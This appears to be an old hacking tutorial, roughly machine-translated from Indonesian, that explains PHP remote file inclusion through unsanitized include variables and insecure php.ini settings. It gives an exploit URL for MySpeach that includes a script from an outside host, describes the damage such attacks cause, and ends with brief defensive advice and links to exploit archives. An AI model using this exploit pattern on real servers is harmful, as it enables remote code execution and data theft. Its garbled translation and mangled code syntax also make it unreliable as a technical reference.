PHP INJECTION

° FOREWORD
---

Remote file inclusion can be defined as inserting a file from an external file in a webserver with the goal of the script will be executed when the file is loaded in disisipi. This technique requires that the webserver is able to run the server side scripting (PHP, ASP, etc) and disisipi file that is created using the script language. Target remote file inclusion usually shaped a portal or content management system (CMS) so that many number of websites vulnerable to this type of attack.

In this article we will be discussing how the file inclusion (which we call the term 'injection') can occur in the PHP language.

° HOW CAN Happen?
--------

A file inclusion attacks occur based on the error or inadvertence pendeklarasian variables in a file. A variable that is not declared or defined correctly can be exploited. Terms of the occurrence of injection itself consists of:

1. Variables that are not declared correctly (unsanitized variables)

Variables in PHP have the syntax:

# 1 include ($ namavariable ". / File ...")
# 2 require_once ($ namavariable. / File ...)
# 3 include_once ($ variable. / File ...)

For example we have a file called jscript.php and there are variables like this:

...
include ($ my_ms [ "root "].'/ error.php ');
...

These variables have the possibility to file disisipi from outside eksploit webserver with PHP script injection:

http://www.target.com/ [Script Path] / jscript.php? my_ms [root] = http://www.injek-pake-kaki.com/script?

Above is an example of exploitation MySpeach <= v3.0.2 (my_ms [root])

2. Settings in php.ini file

# 1. register_globals = On
# 2. magic_quotes = off
# 3. allow_fopenurl = on

° BERBAHAYAKAH?
-------------

File inclusion has a high risk level (High Risk) is very dangerous and even level (Very Dangerous) because the injection permit perpetrators to perform remote command execution (Remote Commands Execution) of the server. This is very dangerous for a server if the perpetrators attempt to gain access to the higher ways to exploit local, so that it can only get access to the administrator or root.

In general the risk of attacks is:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (to get access higher).
3. Running in the process server (psyBNC, bots, etc.)
4. Pilfering aka theft data (information such as credentials, credit cards, etc. ..)
5. And more ...!!! Action including takeovers and server ddos!

° SYSTEM OPERATION immune WHAT?
------------------------------

I remember playing C & C Generals (my fave game!) When a hacker out of the barracks. They say "NO SYSTEMS IS SAFE!". Precisely! There is no operating system safe from injection attacks as long as they use a server side scripting that can be exploited, no matter whether it is Microsoft Windows, Linux, FreeBSD, Solaris, Darwin OS, and others.

° What should be done?
-------------------------

Many portals and communities who are often white hat releases about the latest bugs injection. Most secure way is to always consider the development of which they do so you can make a few improvements to the CMS, which means that now you may use. Always look at the raw logs are usually located on your hosting service. If there is a rather fetching as deviant GET / index.php? Page = http://www.injek-pake-kaki.net/cmd? you must suspicious, because this can only attack against the web portal, or that you manage.

One of the most secure technique for an administrator is to always consider the efforts infiltration and exploitation of local business. Use a firewall to prevent the infiltration of those who are not responsible for and attention to port-server port that is open.

° Ending
------

I write this article based on what I know, and if there is a mistake because my ignorance you can contact me via email. Experience is the best teacher for us all. All can happen because there is no time made perfect. Nobody is perfect! No systems is safe!

° REFERENCES
---------

- Http://net-square.com/papers/one_way/one_way.html (Very simple haxing guides)
- Www.milw0rm.com (Nice place to looking for exploits and buggy things)
- Http://www.packetstormsecurity.org (Great advisory, toolz, exploits and archives)
- Www.google.com (Greatest place to ask!)
- Http://www.ultrapasswords.com/ (Place cooling down to ... We love streaming vids! Yeah!)